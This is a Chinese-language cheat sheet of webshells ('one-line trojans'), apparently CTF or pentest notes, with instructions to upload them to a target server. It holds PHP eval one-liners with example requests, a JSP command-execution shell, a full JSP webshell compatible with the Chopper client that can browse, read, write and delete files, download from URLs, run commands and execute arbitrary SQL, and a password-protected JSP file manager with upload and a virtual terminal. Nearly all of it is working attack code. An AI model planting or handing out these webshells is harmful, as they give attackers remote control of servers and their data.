各种语言的一句话木马
各种语言的一句话木马
PHP
上传xx.php
内容:
1.<?php @eval($_POST['shell']);?>
2.<?php @eval($_GET['shell']);?>
3.<?php phpinfo();?>
4.<?php readfile('/flag');?>//读取文件
请求:
shell参数为需要执行的linux命令或php函数:
http://xxxx/xx.php?shell=phpinfo();
http://xxxx/xx.php?shell=readfile('/flag');
JSP
上传xx.jsp,到tomcat的webapps目录下/usr/local/tomcat/webapps/xxapp 目录下
内容:
1.cmd马:
无回显
<% Runtime.getRuntime().exec(request.getParameter("shell")); %>
有回显
<% java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("shell")).getInputStream(); int a = -1; byte[] b = new byte[2048]; out.print("<pre>"); while((a=in.read(b))!=-1){ out.println(new String(b)); } out.print("</pre>"); %>
请求:
http://x.x.x.x/xx.jsp?shell=whoami
2.一句话:
jsp一句话,菜刀可直连
<%@page import="java.io.*,java.util.*,java.net.*,java.sql.*,java.text.*"%>
<%!String Pwd = "pass";
String EC(String s, String c) throws Exception {
return s;
}//new String(s.getBytes("ISO-8859-1"),c);}
Connection GC(String s) throws Exception {
String[] x = s.trim().split("\r\n");
Class.forName(x[0].trim()).newInstance();
Connection c = DriverManager.getConnection(x[1].trim());
if (x.length > 2) {
c.setCatalog(x[2].trim());
}
return c;
}
void AA(StringBuffer sb) throws Exception {
File r[] = File.listRoots();
for (int i = 0; i < r.length; i++) {
sb.append(r[i].toString().substring(0, 2));
}
}
void BB(String s, StringBuffer sb) throws Exception {
File oF = new File(s), l[] = oF.listFiles();
String sT, sQ, sF = "";
java.util.Date dt;
SimpleDateFormat fm = new SimpleDateFormat("yyyy-MM-dd HH:mm:ss");
for (int i = 0; i < l.length; i++) {
dt = new java.util.Date(l[i].lastModified());
sT = fm.format(dt);
sQ = l[i].canRead() ? "R" : "";
sQ += l[i].canWrite() ? " W" : "";
if (l[i].isDirectory()) {
sb.append(l[i].getName() + "/\t" + sT + "\t" + l[i].length()
+ "\t" + sQ + "\n");
} else {
sF += l[i].getName() + "\t" + sT + "\t" + l[i].length() + "\t"
+ sQ + "\n";
}
}
sb.append(sF);
}
void EE(String s) throws Exception {
File f = new File(s);
if (f.isDirectory()) {
File x[] = f.listFiles();
for (int k = 0; k < x.length; k++) {
if (!x[k].delete()) {
EE(x[k].getPath());
}
}
}
f.delete();
}
void FF(String s, HttpServletResponse r) throws Exception {
int n;
byte[] b = new byte[512];
r.reset();
ServletOutputStream os = r.getOutputStream();
BufferedInputStream is = new BufferedInputStream(new FileInputStream(s));
os.write(("->" + "|").getBytes(), 0, 3);
while ((n = is.read(b, 0, 512)) != -1) {
os.write(b, 0, n);
}
os.write(("|" + "<-").getBytes(), 0, 3);
os.close();
is.close();
}
void GG(String s, String d) throws Exception {
String h = "0123456789ABCDEF";
int n;
File f = new File(s);
f.createNewFile();
FileOutputStream os = new FileOutputStream(f);
for (int i = 0; i < d.length(); i += 2) {
os
.write((h.indexOf(d.charAt(i)) << 4 | h.indexOf(d
.charAt(i + 1))));
}
os.close();
}
void HH(String s, String d) throws Exception {
File sf = new File(s), df = new File(d);
if (sf.isDirectory()) {
if (!df.exists()) {
df.mkdir();
}
File z[] = sf.listFiles();
for (int j = 0; j < z.length; j++) {
HH(s + "/" + z[j].getName(), d + "/" + z[j].getName());
}
} else {
FileInputStream is = new FileInputStream(sf);
FileOutputStream os = new FileOutputStream(df);
int n;
byte[] b = new byte[512];
while ((n = is.read(b, 0, 512)) != -1) {
os.write(b, 0, n);
}
is.close();
os.close();
}
}
void II(String s, String d) throws Exception {
File sf = new File(s), df = new File(d);
sf.renameTo(df);
}
void JJ(String s) throws Exception {
File f = new File(s);
f.mkdir();
}
void KK(String s, String t) throws Exception {
File f = new File(s);
SimpleDateFormat fm = new SimpleDateFormat("yyyy-MM-dd HH:mm:ss");
java.util.Date dt = fm.parse(t);
f.setLastModified(dt.getTime());
}
void LL(String s, String d) throws Exception {
URL u = new URL(s);
int n;
FileOutputStream os = new FileOutputStream(d);
HttpURLConnection h = (HttpURLConnection) u.openConnection();
InputStream is = h.getInputStream();
byte[] b = new byte[512];
while ((n = is.read(b, 0, 512)) != -1) {
os.write(b, 0, n);
}
os.close();
is.close();
h.disconnect();
}
void MM(InputStream is, StringBuffer sb) throws Exception {
String l;
BufferedReader br = new BufferedReader(new InputStreamReader(is));
while ((l = br.readLine()) != null) {
sb.append(l + "\r\n");
}
}
void NN(String s, StringBuffer sb) throws Exception {
Connection c = GC(s);
ResultSet r = c.getMetaData().getCatalogs();
while (r.next()) {
sb.append(r.getString(1) + "\t");
}
r.close();
c.close();
}
void OO(String s, StringBuffer sb) throws Exception {
Connection c = GC(s);
String[] t = { "TABLE" };
ResultSet r = c.getMetaData().getTables(null, null, "%", t);
while (r.next()) {
sb.append(r.getString("TABLE_NAME") + "\t");
}
r.close();
c.close();
}
void PP(String s, StringBuffer sb) throws Exception {
String[] x = s.trim().split("\r\n");
Connection c = GC(s);
Statement m = c.createStatement(1005, 1007);
ResultSet r = m.executeQuery("select * from " + x[3]);
ResultSetMetaData d = r.getMetaData();
for (int i = 1; i <= d.getColumnCount(); i++) {
sb.append(d.getColumnName(i) + " (" + d.getColumnTypeName(i)
+ ")\t");
}
r.close();
m.close();
c.close();
}
void QQ(String cs, String s, String q, StringBuffer sb) throws Exception {
int i;
Connection c = GC(s);
Statement m = c.createStatement(1005, 1008);
try {
ResultSet r = m.executeQuery(q);
ResultSetMetaData d = r.getMetaData();
int n = d.getColumnCount();
for (i = 1; i <= n; i++) {
sb.append(d.getColumnName(i) + "\t|\t");
}
sb.append("\r\n");
while (r.next()) {
for (i = 1; i <= n; i++) {
sb.append(EC(r.getString(i), cs) + "\t|\t");
}
sb.append("\r\n");
}
r.close();
} catch (Exception e) {
sb.append("Result\t|\t\r\n");
try {
m.executeUpdate(q);
sb.append("Execute Successfully!\t|\t\r\n");
} catch (Exception ee) {
sb.append(ee.toString() + "\t|\t\r\n");
}
}
m.close();
c.close();
}%>
<%
String cs = request.getParameter("z0")==null?"gbk": request.getParameter("z0") + "";
request.setCharacterEncoding(cs);
response.setContentType("text/html;charset=" + cs);
String Z = EC(request.getParameter(Pwd) + "", cs);
String z1 = EC(request.getParameter("z1") + "", cs);
String z2 = EC(request.getParameter("z2") + "", cs);
StringBuffer sb = new StringBuffer("");
try {
sb.append("->" + "|");
if (Z.equals("A")) {
String s = new File(application.getRealPath(request
.getRequestURI())).getParent();
sb.append(s + "\t");
if (!s.substring(0, 1).equals("/")) {
AA(sb);
}
} else if (Z.equals("B")) {
BB(z1, sb);
} else if (Z.equals("C")) {
String l = "";
BufferedReader br = new BufferedReader(
new InputStreamReader(new FileInputStream(new File(
z1))));
while ((l = br.readLine()) != null) {
sb.append(l + "\r\n");
}
br.close();
} else if (Z.equals("D")) {
BufferedWriter bw = new BufferedWriter(
new OutputStreamWriter(new FileOutputStream(
new File(z1))));
bw.write(z2);
bw.close();
sb.append("1");
} else if (Z.equals("E")) {
EE(z1);
sb.append("1");
} else if (Z.equals("F")) {
FF(z1, response);
} else if (Z.equals("G")) {
GG(z1, z2);
sb.append("1");
} else if (Z.equals("H")) {
HH(z1, z2);
sb.append("1");
} else if (Z.equals("I")) {
II(z1, z2);
sb.append("1");
} else if (Z.equals("J")) {
JJ(z1);
sb.append("1");
} else if (Z.equals("K")) {
KK(z1, z2);
sb.append("1");
} else if (Z.equals("L")) {
LL(z1, z2);
sb.append("1");
} else if (Z.equals("M")) {
String[] c = { z1.substring(2), z1.substring(0, 2), z2 };
Process p = Runtime.getRuntime().exec(c);
MM(p.getInputStream(), sb);
MM(p.getErrorStream(), sb);
} else if (Z.equals("N")) {
NN(z1, sb);
} else if (Z.equals("O")) {
OO(z1, sb);
} else if (Z.equals("P")) {
PP(z1, sb);
} else if (Z.equals("Q")) {
QQ(cs, z1, z2, sb);
}
} catch (Exception e) {
sb.append("ERROR" + ":// " + e.toString());
}
sb.append("|" + "<-");
out.print(sb.toString());
%>
小马,上传
<%@page import="java.io.*" contentType="text/html; charset=UTF-8" %>
<%@page import="java.util.zip.*" contentType="text/html; charset=UTF-8" %>
<%@page import="java.util.*" contentType="text/html; charset=UTF-8" %>
<%@page import="java.lang.StringBuilder" contentType="text/html; charset=UTF-8" %>
<%@page import="java.net.URLDecoder" contentType="text/html; charset=UTF-8" %>
<%!
void recursionZip(ZipOutputStream zipOut, File file, String baseDir) throws Exception {
if (file.isDirectory()) {
File[] files = file.listFiles();
for (File fileSec : files) {
recursionZip(zipOut, fileSec, baseDir + file.getName() + File.separator);
}
} else {
byte[] buf = new byte[1024];
InputStream input = new FileInputStream(file);
zipOut.putNextEntry(new ZipEntry(baseDir + file.getName()));
System.out.println(file + "压缩成功!");
int len;
while ((len = input.read(buf)) != -1) {
zipOut.write(buf, 0, len);
}
input.close();
}
}
boolean zip(String filepath, String zipPath) {
try {
File file = new File(filepath);// 要被压缩的文件夹
File zipFile = new File(zipPath);
ZipOutputStream zipOut = new ZipOutputStream(new FileOutputStream(zipFile));
if (file.isDirectory()) {
File[] files = file.listFiles();
for (File fileSec : files) {
if (!fileSec.getAbsolutePath().equals(zipFile.getAbsolutePath()))
recursionZip(zipOut, fileSec, file.getName() + File.separator);
}
} else {
recursionZip(zipOut, file, "");
}
zipOut.close();
} catch (Exception e) {
return false;
}
return true;
}
void copyStream(final InputStream[] ins, final JspWriter out) {
for (final InputStream in : ins) {
new Thread(new Runnable() {
// @Override 不兼容低版本
public void run() {
if (in == null) return;
try {
int a = -1;
byte[] b = new byte[2048];
while ((a = in.read(b)) != -1) {
out.println(new String(b));
}
} catch (Exception e) {
} finally {
try {
if (in != null) in.close();
} catch (Exception ec) {
}
}
}
}).start();
}
}
String uploadFile(DataInputStream is, String path, int size, String sp) throws IOException {
if (size > 20 * 1024 * 1024) {
return "上传失败,文件太大!";
}
byte bts[] = new byte[size];
int br = 0;
int tbr = 0;
//上传的数据保存在byte数组里面
while (tbr < size) {
br = is.read(bts, tbr, size);
tbr += br;
}
String file = new String(bts, "utf-8");
String sf = file.substring(file.indexOf("filename=\"") + 10);
sf = sf.substring(0, sf.indexOf("\n")).replaceAll("/\\+", "/");
sf = sf.substring(sf.lastIndexOf("/") + 1, sf.indexOf("\""));
String fileName = path + "/" + sf;
int pos;
pos = file.indexOf("filename = \"");
pos = file.indexOf("\n", pos) + 1;
pos = file.indexOf("\n", pos) + 1;
pos = file.indexOf("\n", pos) + 1;
int bl = file.indexOf(sp, pos) - 4;
//取得文件数据的开始的位置
int startPos = ((file.substring(0, pos)).getBytes()).length;
int endPos = ((file.substring(0, bl)).getBytes()).length;
File checkFile = new File(fileName);
if (checkFile.exists()) {
checkFile.delete();
}
FileOutputStream fileOut = new FileOutputStream(fileName);
fileOut.write(bts, startPos, (endPos - startPos));
fileOut.close();
return sf + "文件上传成功!";
}
String getCurrentPath(String file, String p, String url) throws IOException {
String path = "";
String tmpFile = file.replaceAll("/[^/]+/?$", "/");
while (!file.equals(tmpFile)) {
path = "<a href='" + url + "?p=" + p + "&f=" + file + "'>" + file.replaceAll(tmpFile, "") + "</a>" + path;
file = tmpFile;
tmpFile = file.replaceAll("/[^/]+/?$", "/");
}
path = "<a href='" + url + "?p=" + p + "&f=" + file + "'>" + file + "</a>" + path;
return path;
}
%>
<%
//验证用户名
String dp = "ruphy";
response.setCharacterEncoding("UTF-8");
String url = request.getRequestURL().toString();
String p = request.getParameter("p");
if (!dp.equals(p)) {
if (!"true".equals(request.getParameter("c"))) {
out.println("<div style='text-align: center;'>访问失败!<span style='color: red'>密码错误!</span></div>");
out.println("<div style='text-align: center;'><span>usage: <a style='color: black' href='" + url + "?p=passwd&f=path' >" + url + "?p=passwd&f=path</a></span></div>");
out.println("<div style='text-align: center; color: blue'>@copyright by ruphy.</div>");
}
return;
}
String m = request.getParameter("m");
if (m != null && !"".equals(m.trim())) {
out.println("开始执行命令: " + m);
out.flush();
String[] cmds = new String[]{"sh", "-c", m};
if (System.getProperty("os.name").toLowerCase().contains("windows")) {
cmds = new String[]{"cmd", "/k", m};
}
Process ps = null;
out.print("<xmp>");
try {
ps = Runtime.getRuntime().exec(cmds);
copyStream(new InputStream[]{ps.getInputStream(), ps.getErrorStream()}, out);
ps.getOutputStream().close();
ps.waitFor();
} catch (Exception e) {
out.println("<div>执行命令 " + m + " 发生错误!</div>");
} finally {
try {
if (ps != null) ps.destroy();
} catch (Exception ec) {
out.println("关闭流出错!");
}
}
out.println("</xmp>");
out.println("<div>执行命令: " + m + " 完成!</div>");
return;
}
String fn = request.getParameter("f");
if (fn == null || "".equals(fn.trim())) {
fn = application.getRealPath("/");
}
String f = fn.replaceAll("\\\\+", "/").replaceAll("/+", "/");
String ct = request.getContentType();
if (ct != null && ct.indexOf("multipart/form-data") >= 0) {
DataInputStream is = new DataInputStream(request.getInputStream());
String msg = uploadFile(is, f, request.getContentLength(), ct.substring(ct.lastIndexOf("=") + 1, ct.length()));
out.println("<script>alert('" + msg + "');location.href='" + url + "?p=" + dp + "&f=" + f + "';</script>");
return;
}
File file = new File(f);
if (!file.exists()) {
out.println("<script>alert('输入目录或者文件不存在!')</script>");
}
if ("true".equals(request.getParameter("t")) && file.exists()) {
if (zip(f, new File(f).getAbsolutePath() + ".zip")) {
out.println("<script>alert('压缩成功!');location.href=location.href.replace(\"&t=true\", \"\").replace(/\\/[^\\/]+$/, '');</script>");
}
out.println("<script>alert('压缩失败');location.href=location.href.replace(\"&t=true\", \"\").replace(/\\/[^\\/]+$/, '');</script>");
return;
}
if (file.isDirectory() && file.canRead()) {
StringBuilder sb = new StringBuilder();
File[] files = File.listRoots();
String roots = "";
for (int i = 0; i < files.length; i++) {
roots += "<a style=\"margin-left: 10px;\" href=\"" + url + "?p=" + dp + "&f=" + files[i].getPath().replaceAll("\\\\+", "/") + "/\">" + files[i].getPath() + "</a>";
}
sb.append("<div><div>");
sb.append("<div style='margin: 10px 0 0 20px'><form action=" + url + "?p=" + dp + "&f=" + f + " method='post' enctype='multipart/form-data'>文件上传: <input name='fileName' type='file'><input onclick='return confirm(\"上传到当前目录:" + f + "?\")' value='上传' type='submit'></form>");
sb.append("</div><div style='margin: 5px 0 20px 20px'><span>根目录:" + roots + "</span><span style=\"margin-left: 20px;\">当前目录:" + getCurrentPath(f, dp, url) + "</span>"
+ "<span style=\"margin-left: 20px;\" ><a href=\"" + url + "?p=" + dp + "&f=" + f.replaceAll("/[^/]+/?$", "/") + "\">返回上级目录</a></span>"
+ "</div>");
sb.append("<div style='max-height: 400px; overflow: auto; background-color: #ffe;'><table><tbody>");
files = file.listFiles();
for (int i = 0; i < files.length; i++) {
if (files[i].canRead()) {
sb.append("<tr>"
+ "<td><a style=\"margin-left: 20px;\" href='" + url + "?p=" + dp + "&f=" + f + "/" + files[i].getName() + "'>" + files[i].getName() + "</a></td>"
+ "<td><a style=\"margin-left: 20px;\" onclick='return confirm(\"确定删除吗?\")' href=\"" + url + "?p=" + dp + "&r=true&f=" + f + "/" + files[i].getName() + "\">删除</a></td>"
+ (!files[i].isFile() ? "<td></td>" : "<td><a style=\"margin-left: 20px;\" onclick=\"top.document.getElementById('view-file').setAttribute('src', '" + url + "?p=ruphy&v=true&w=true&f=" + f + "/" + files[i].getName() + "');\" href=\"#\">查看</a></td>")
+ "<td><a style=\"margin-left: 20px;\" href=\"" + url + "?p=" + dp + "&t=true&f=" + f + "/" + files[i].getName() + "\">压缩</a>"
+ "<span style=\"margin-left: 20px\">" + files[i].length() / 1024 + "KB(" + files[i].length() / 1024 / 1024 + "MB)</span></td>"
+ "</tr>");
}
}
sb.append("</tbody></table></div></div>");
sb.append("<div style='background-color: #ccc;'>");
sb.append("<div style='margin: 20px'>虚拟终端:<input id='command' type='text' value='netstat -an' style='width: 250px;border: none;color: red;background-color: black;'/>"
+ "<a style='color: blue' onclick=\"var m= top.document.getElementById('command').value;if(!m) return false; top.document.getElementById('view-file').setAttribute('src', '" + url + "?p=ruphy&m=' + encodeURIComponent(m));\" href=\"#\">执行</a>"
+ "</div>");
sb.append("<div style='margin-top: 20px; padding: 5px; height: 600px;max-height: 100%'>"
+ "<iframe id='view-file' src='" + url + "?c=true' height='100%' style='width: 100%; height: 100%' frameborder='0'></iframe>"
+ "</div>");
sb.append("</div>");
out.println(sb.toString());
out.println("<div><div style='text-align: center;'><span>usage: <a style='color: black' href='" + url + "' >" + url + "?p=passwd</a></span></div>");
out.println("<div style='text-align: center; color: blue'>@copyright by ruphy.</div></div>");
sb.append("</div>");
return;
}
if ("true".equals(request.getParameter("r"))) {
if (file.delete()) {
out.println("<script>alert('删除成功!');location.href=location.href.replace(\"&r=true\", \"\").replace(/\\/[^\\/]+$/, '');</script>");
}
out.println("<script>alert('删除失败!');location.href=location.href.replace(\"&r=true\", \"\").replace(/\\/[^\\/]+$/, '');</script>");
return;
}
if (!"true".equals(request.getParameter("v"))) {
response.setContentType("application/octet-stream");
response.setHeader("Content-Disposition", "attachment; filename=" + f.replaceAll(".+/+", "").replace(" ", "_"));
} else if (file.length() > 1024 * 1024 * 10) {
out.println("文件太大,请下载查看!");
return;
}
String ctt = java.nio.file.Files.probeContentType(file.toPath());
ctt = ctt == null ? "others" : ctt.replaceAll("\\/+.*", "");
if ("true".equals(request.getParameter("w"))) {
String u = url + "?p=ruphy&v=true&l=true&f=" + f;
if ("video".equals(ctt)) {
out.println("<div style='width: 800px'><video style='margin-top: 5px; width: 100%' controls=\"controls\" autoplay=\"autoplay\" src='" + u + "' /></div>");
return;
}
if ("audio".equals(ctt)) {
out.println("<div style='width: 300px'><audio style='width: 100%' controls=\"controls\" autoplay=\"autoplay\" src='" + u + "' /></div>");
return;
}
if ("image".equals(ctt)) {
out.println("<div style='width: 600px'><img style='margin-top: 5px; width:100%;' alt='非图片' src='" + u + "'/></div>");
return;
}
}
if ("true".equals(request.getParameter("l"))) {
OutputStream streamOut = response.getOutputStream();
InputStream streamIn = new FileInputStream(file);
int length = streamIn.available();
int bytesRead = 0;
byte[] buffer = new byte[1024];
while ((bytesRead = streamIn.read(buffer, 0, 1024)) != -1) {
streamOut.write(buffer, 0, bytesRead);
}
response.flushBuffer();
streamIn.close();
streamOut.close();
return;
}
FileInputStream fis = new FileInputStream(file);
InputStreamReader isr = new InputStreamReader(fis, "UTF-8");
BufferedReader br = new BufferedReader(isr);
StringBuilder sb = new StringBuilder();
sb.append("<xmp>\n");
String line = null;
while ((line = br.readLine()) != null) {
sb.append(line);
sb.append("\n");
}
sb.append("</xmp>");
out.println(sb.toString());
fis.close();
isr.close();
br.close();
%>